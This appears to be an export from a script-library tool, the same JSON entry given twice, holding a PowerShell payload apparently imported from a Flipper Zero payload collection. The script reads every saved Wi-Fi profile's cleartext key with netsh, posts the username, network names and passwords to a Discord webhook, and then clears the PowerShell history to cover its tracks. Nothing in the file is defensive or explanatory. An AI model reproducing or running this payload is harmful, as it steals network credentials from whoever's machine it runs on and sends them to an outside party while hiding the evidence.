{
"id": "6725c09e-7653-4d08-ad96-8284d94bd3af",
"name": "Windows-Passwords-ENG (Copy)",
"description": "Imported from aleff-github/my-flipper-shits • source: Windows-Passwords-ENG.ps1",
"script": "\n# ENG\nnetsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {\n $wlan = $_.Matches.Value\n $passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'\n\n\t$Body = @{\n\t\t'username' = $env:username + " | " + [string]$wlan\n\t\t'content' = [string]$passw\n\t}\n\t\n\tInvoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)\n}\n\n# Clear the PowerShell command history\nClear-History\n",
"tags": [
"imported",
"github",
"aleff-gith"
],
"parameters": [],
"updatedAt": "2026-04-07T05:58:31.015854",
"isBuiltin": false
}
{
"id": "6725c09e-7653-4d08-ad96-8284d94bd3af",
"name": "Windows-Passwords-ENG (Copy)",
"description": "Imported from aleff-github/my-flipper-shits • source: Windows-Passwords-ENG.ps1",
"script": "\n# ENG\nnetsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {\n $wlan = $_.Matches.Value\n $passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'\n\n\t$Body = @{\n\t\t'username' = $env:username + " | " + [string]$wlan\n\t\t'content' = [string]$passw\n\t}\n\t\n\tInvoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)\n}\n\n# Clear the PowerShell command history\nClear-History\n",
"tags": [
"imported",
"github",
"aleff-gith"
],
"parameters": [],
"updatedAt": "2026-04-07T05:58:31.015854",
"isBuiltin": false
}